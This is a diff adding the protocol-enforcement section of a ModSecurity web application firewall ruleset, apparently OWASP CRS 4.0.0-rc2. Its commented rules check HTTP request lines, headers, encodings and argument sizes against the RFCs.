+# the client is supposed to interact with the server.
+# https://www.rfc-editor.org/rfc/rfc9110.html
+
+
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# Validate request line against the format specified in the HTTP RFC
+#
+# -=[ Rule Logic ]=-
+#
+# Uses rule negation against the regex for positive security. The regex specifies the proper
+# construction of URI request lines such as:
+#
+# "http" "://" authority path-abempty [ "?" query ]
+#
+# It also outlines proper construction for CONNECT, OPTIONS and GET requests.
+#
+# Regular expression generated from regex-assembly/920100.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 920100
+#
+# -=[ References ]=-
+# https://www.rfc-editor.org/rfc/rfc9110.html#section-4.2.1
+# http://capec.mitre.org/data/definitions/272.html
+#
+SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\v]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?)[\s\v]+[\.-9A-Z_a-z]+)$" \
+ "id:920100,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Invalid HTTP Request Line',\
+ logdata:'%{request_line}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Identify multipart/form-data name evasion attempts
+#
+# There are possible impedance mismatches between how
+# ModSecurity interprets multipart file names and how
+# a destination app server such as PHP might parse the
+# Content-Disposition data:
+#
+# filename-parm := "filename" "=" value
+#
+# -=[ Rule Logic ]=-
+# These rules check for the existence of the ' " ; = meta-characters in
+# either the "name" (FILES) and "filename" (FILES_NAMES) variables.
+# HTML entities may lead to false positives, which is why
+# frequently used ones, such as "ä", are allowed at PL1.
+#
+# -=[ Targets, characters and html entities ]=-
+#
+# 920120 + 920122: PL1 : FILES_NAMES, FILES
+# Disallow ['\";=], except for frequently used HTML entities (see 920120.data).
+#
+# 920121: PL2 : FILES_NAMES, FILES
+# Disallow ['\";=]
+#
+# -=[ References ]=-
+# http://www.ietf.org/rfc/rfc2183.txt
+#
+# This rule used to use negative look-behind.
+# See https://github.com/coreruleset/coreruleset/wiki/Technical-Decisions-and-Best-Practices#avoiding-negative-look-behind-in-regular-expressions
+# for an explanation of why it now uses `!@rx` instead to avoid look-around.
+#
+# Regular expression generated from regex-assembly/920120.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 920120
+#
+SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegiln-or-suz]acut|[aeiou]grav|[ain-o]tild)e|[c-elnr-tz]caron|(?:[cgk-lnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\"';=])*$" \
+ "id:920120,\
+ phase:2,\
+ block,\
+ t:none,t:urlDecodeUni,\
+ msg:'Attempted multipart/form-data bypass',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Accept only digits in content length
+#
+# -=[ Rule Logic ]=-
+# This rule uses ModSecurity's rule negation against the regex meaning if the Content-Length header
+# is NOT all digits, then it will match.
+#
+# -=[ References ]=-
+# https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6
+#
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920160,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Content-Length HTTP header is not numeric',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Do not accept GET or HEAD requests with bodies
+# In RCF-9110, "A client SHOULD NOT generate content in a HEAD/GET request
+# unless it is made directly to an origin server that has previously indicated"
+#
+# -=[ Rule Logic ]=-
+# The chained rule matches when:
+# 1) If the request method is GET or HEAD
+# AND
+# 2) Header: Content-Length exists and non-zero
+#
+# -=[ References ]=-
+# https://www.rfc-editor.org/rfc/rfc9110.html#section-9.3.1
+# https://www.rfc-editor.org/rfc/rfc9110.html#section-9.3.2
+#
+SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
+ "id:920170,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'GET or HEAD Request with Body Content',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# This is a sibling of rule 920170
+#
+SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
+ "id:920171,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'GET or HEAD Request with Transfer-Encoding',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+
tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Require Content-Length or Transfer-Encoding to be provided with
+# every POST request if the protocol version is not HTTP/2 or HTTP/3.
+#
+# In case of HTTP/2, see the RFC7540 8.1 p52:
+# HTTP/2 does not use the Transfer-Encoding: chunked anymore, because
+# the underlying transport protocol is already using data frames with
+# known length.
+#
+# In case of HTTP/3, see the RFC9114 4.1:
+# Transfer codings (see Section 7 of [HTTP/1.1]) are not defined for
+# HTTP/3; the Transfer-Encoding header field MUST NOT be used.
+#
+# -=[ Rule Logic ]=-
+# This chained rule checks if the protocol is not HTTP/2 or HTTP/3,
+# then checks request method is POST, if so, it checks that a
+# Content-Length or Transfer-Encoding headers are also present.
+#
+SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \
+ "id:920180,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'POST without Content-Length or Transfer-Encoding headers',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule REQUEST_METHOD "@streq POST" \
+ "chain"
+ SecRule &REQUEST_HEADERS:Content-Length "@eq 0" \
+ "chain"
+ SecRule &REQUEST_HEADERS:Transfer-Encoding "@eq 0" \
+ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+#
+# As per RFC7230 3.3.2: A sender MUST NOT send a Content-Length
+# header field in any message that contains a Transfer-Encoding header
+# field.
+#
+# Related to 920170, 920171 and 920180.
+#
+SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
+ "id:920181,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Content-Length and Transfer-Encoding headers present',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Range Header Check
+#
+# RFC7233 2.1 p6:
+# "A byte-range-spec is invalid if the last-byte-pos value is present
+# and less than the first-byte-pos."
+#
+# -=[ Rule Logic ]=-
+# This rule compares the first and second byte ranges and flags
+# when the first value is greater than the second.
+#
+# -=[ References ]=-
+# https://datatracker.ietf.org/doc/html/rfc7233
+# https://seclists.org/fulldisclosure/2011/Aug/175
+#
+SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \
+ "id:920190,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Range: Invalid Last Byte Value',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule TX:2 "@lt %{tx.1}" \
+ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Broken/Malicious clients often have duplicate or conflicting headers
+# Automated programs and bots often do not obey the HTTP RFC
+#
+# -=[ Rule Logic ]=-
+# This rule inspects the Connection header and looks for duplicates of the
+# keep-alive and close options.
+#
+# -=[ References ]=-
+# https://datatracker.ietf.org/doc/html/rfc7233
+#
+SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive|close)\b" \
+ "id:920210,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Multiple/Conflicting Connection Header Data Found',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+#
+# Check URL encodings
+#
+# -=[ Rule Logic ]=-
+# There are two different chained rules. We need to separate them as we are inspecting two
+# different variables - REQUEST_URI and REQUEST_BODY. For REQUEST_BODY, we only want to
+# run the @validateUrlEncoding operator if the content-type is application/x-www-form-urlencoding.
+#
+# -=[ References ]=-
+# http://www.ietf.org/rfc/rfc1738.txt
+#
+# -=[ Example payload ]=-
+# http://localhost/?s=a%20b%20c%'/
+# reason: %'/ is not a valid url encoding
+#
+SecRule REQUEST_URI "@rx \x25" \
+ "id:920220,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'URL Encoding Abuse Attack Attempt',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/267/72',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule REQUEST_URI "@validateUrlEncoding" \
+ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded" \
+ "id:920240,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'URL Encoding Abuse Attack Attempt',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+
tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/267/72',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule REQUEST_BODY "@rx \x25" \
+ "chain"
+ SecRule REQUEST_BODY "@validateUrlEncoding" \
+ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Check UTF encoding
+# We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise
+# it will result in false positives.
+#
+# -=[ Rule Logic ]=-
+# This chained rule first checks to see if the admin has set the TX:CRS_VALIDATE_UTF8_ENCODING
+# variable in the crs-setup.conf file.
+#
+SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \
+ "id:920250,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'UTF8 Encoding Abuse Attack Attempt',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/267',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ chain"
+ SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \
+ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Disallow use of full-width unicode as decoding evasions may be possible.
+#
+# -=[ Rule Logic ]=-
+# This rule looks for full-width encoding by looking for %u followed by 2 'f'
+# characters and then 2 hex characters. It is a vulnerability that affected
+# IIS circa 2007.
+# The rule will trigger on %uXXXX formatted chars that are full or half
+# width, as explained above. This %uXXXX format is passed as a raw parameter
+# and is (seemingly only) accepted by IIS (5.0, 6.0, 7.0, and 8.0). Other
+# webservers will only process unicode chars presented as hex UTF-8 bytes.
+#
+# -=[ References ]=-
+# http://www.kb.cert.org/vuls/id/739224
+# https://www.checkpoint.com/defense/advisories/public/2007/cpai-2007-201.html
+# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/719
+#
+# Regular expression generated from regex-assembly/920260.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 920260
+#
+SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \
+ "id:920260,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Unicode Full/Half Width Abuse Attack Attempt',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-iis',\
+ tag:'platform-windows',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/267/72',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Restrict type of characters sent
+#
+# This is a rule with multiple stricter siblings that grows more
+# restrictive in higher paranoia levels.
+#
+# -=[ Rule Logic ]=-
+# This rule uses the @validateByteRange operator to restrict the request
+# payloads.
+#
+# -=[ Targets and ASCII Ranges ]=-
+#
+# 920270: PL1 : REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
+# ASCII 1-255 : Full ASCII range without null character
+#
+# 920271: PL2 : REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
+# ASCII 9,10,13,32-126,128-255 : Full visible ASCII range, tab, newline
+#
+# 920272: PL3 : REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES and REQUEST_BODY
+# ASCII 32-36,38-126 : Visible lower ASCII range without percent symbol
+#
+# 920273: PL4 : ARGS, ARGS_NAMES and REQUEST_BODY
+# ASCII 38,44-46,48-58,61,65-90,95,97-122
+# A-Z a-z 0-9 = - _ .
, : &
+# 920274: PL4 : REQUEST_HEADERS without User-Agent, Referer, Cookie
+# and Structured Header booleans
+# ASCII 32,34,38,42-59,61,65-90,95,97-122
+# A-Z a-z 0-9 = - _ . , : & " * + / SPACE
+#
+# REQUEST_URI and REQUEST_HEADERS User-Agent, Referer and Cookie are very hard
+# to restrict beyond the limits in 920272. Structured Header booleans are
+# validated separately in 920275.
+#
+# 920274 generally has few positives. However, it would detect rare attacks
+# on Accept request headers and friends.
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
+ "id:920270,\
+ phase:2,\
+ block,\
+ t:none,t:urlDecodeUni,\
+ msg:'Invalid character in request (null character)',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Do not accept requests without common headers.
+# All normal web browsers include Host, User-Agent and Accept headers.
+# Implies either an attacker or a legitimate automation client.
+#
+
+#
+# Missing/Empty Host Header
+#
+# -=[ Rule Logic ]=-
+# These rules will first check to see if a Host header is present.
+# The second check is to see if a Host header exists but is empty.
+#
+SecRule &REQUEST_HEADERS:Host "@eq 0" \
+ "id:920280,\
+ phase:1,\
+ pass,\
+ t:none,\
+ msg:'Request Missing a Host Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/6.5.10',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\
+ skipAfter:END-HOST-CHECK"
+
+
+SecRule REQUEST_HEADERS:Host "@rx ^$" \
+ "id:920290,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Empty Host Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+SecMarker "END-HOST-CHECK"
+
+
+#
+# Empty Accept Header
+#
+# -=[ Rule Logic ]=-
+# This rule checks if an Accept header exists, but has an empty value.
+# This is only allowed in combination with the OPTIONS method.
+# Additionally, there are some clients sending empty Accept headers.
+# They are covered in another chained rule checking the User-Agent.
+# This technique demands a separate rule to detect an empty
+# Accept header if there is no user agent. This is checked via
+# the separate rule 920311.
+#
+# Exclude some common broken clients sending empty Accept header:
+# "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0" (CRS issue #515)
+# "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0" (CRS issue #366)
+#
+# -=[ References ]=-
+# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/366
+#
+
+SecRule REQUEST_HEADERS:Accept "@rx ^$" \
+ "id:920310,\
+ phase:1,\
+ pass,\
+ t:none,\
+ msg:'Request Has an Empty Accept Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'NOTICE',\
+ chain"
+ SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
+ "chain"
+ SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android Business Enterprise Entreprise" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
+
+#
+# This rule is a sibling of rule 920310.
+#
+SecRule REQUEST_HEADERS:Accept "@rx ^$" \
+ "id:920311,\
+ phase:1,\
+ pass,\
+ t:none,\
+ msg:'Request Has an Empty Accept Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'NOTICE',\
+ chain"
+ SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
+ "chain"
+ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
+
+
+#
+# Empty User-Agent Header
+#
+# -=[ Rule Logic ]=-
+# This rules will check to see if the User-Agent header is empty.
+#
+# Note that there is a second rule, 920320, which will check for
+# the existence of the User-Agent header.
+#
+
+SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \
+ "id:920330,\
+ phase:1,\
+ pass,\
+ t:none,\
+ msg:'Empty User Agent Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'NOTICE',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
+
+#
+# Missing Content-Type Header with Request Body
+#
+# -=[ Rule Logic ]=-
+# This rule will first check to see if the value of the Content-Length header is
+# non-equal to 0. The chained rule is then checking the existence of the
+# Content-Type header. The RFCs do not state there must be a
+# Content-Type header. However, a request missing a Content-Header is a
+# strong indication of a non-compliant browser.
+#
+# Also, omitting the CT header allows to bypass the Request Body Processor
+# unless you set the optional tx.enforce_bodyproc_urlencoded variable.
+#
+# Note: in default settings, this behavior only provides a NOTICE and will
+# not cause a request to be blocked. However, in paranoia level 2 or
+# higher, we run sibling 920341, which DOES block these requests.
+#
+# -=[ References ]=-
+# http://httpwg.org/specs/rfc7231.html#header.content-type
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
+ "id:920340,\
+ phase:1,\
+ pass,\
+ t:none,\
+ msg:'Request Containing Content, but Missing Content-Type header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'NOTICE',\
+ chain"
+ SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
+
+# Check that the host header is not an IP address
+# This is not an HTTP RFC violation but it is indicative of automated client access.
+# Many web-based worms propagate by scanning IP address blocks.
+#
+# -=[ Rule Logic ]=-
+# This rule triggers if the Host header contains an IPv4 or IPv6 address, optionally
+# extended with a port number. In the case of IPv6 we covering the address with square
+# brackets and the address without square brackets.
+#
+# The regex consists of three main parts and said optional group:
+#
+# * IPv4 address
+# * IPv6 address with square brackets
+# * IPv6 address without square brackets
+# * optional colon and port number
+#
+# Please note that the regex does not test the validity of the IP addresses.
+# It just tries to detect a potential IP address.
+#
+# -=[ References ]=-
+# https://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx
+#
+
+SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$)" \
+ "id:920350,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Host header is a numeric IP address',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/6.5.10',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'WARNING',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+# In most cases, you should expect a certain volume of each a request on your
+# website. For example, a request with 400 arguments, can be suspicious.
+# This file creates limitations on the request.
+#
+# TODO Look at the rules in this file, and define the sizes you'd like to enforce.
+# Note that most of the rules are commented out by default.
+# Uncomment the rules you need
+#
+
+
+#
+# Maximum number of arguments in request limited
+#
+SecRule &TX:MAX_NUM_ARGS "@eq 1" \
+ "id:920380,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Too many arguments in request',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule &ARGS "@gt %{tx.max_num_args}" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+## -- Arguments limits --
+#
+# Limit argument name length
+#
+SecRule &TX:ARG_NAME_LENGTH "@eq 1" \
+ "id:920360,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Argument name too long',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \
+ "t:none,t:length,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Limit argument value length
+#
+# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
+# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
+#
+SecRule &TX:ARG_LENGTH "@eq 1" \
+ "id:920370,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Argument value too long',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule ARGS "@gt %{tx.arg_length}" \
+ "t:none,t:length,\
+
setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Limit arguments total length
+#
+SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \
+ "id:920390,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Total arguments size exceeded',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -- File upload limits --
+#
+# Individual file size is limited
+SecRule &TX:MAX_FILE_SIZE "@eq 1" \
+ "id:920400,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Uploaded file size too large',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
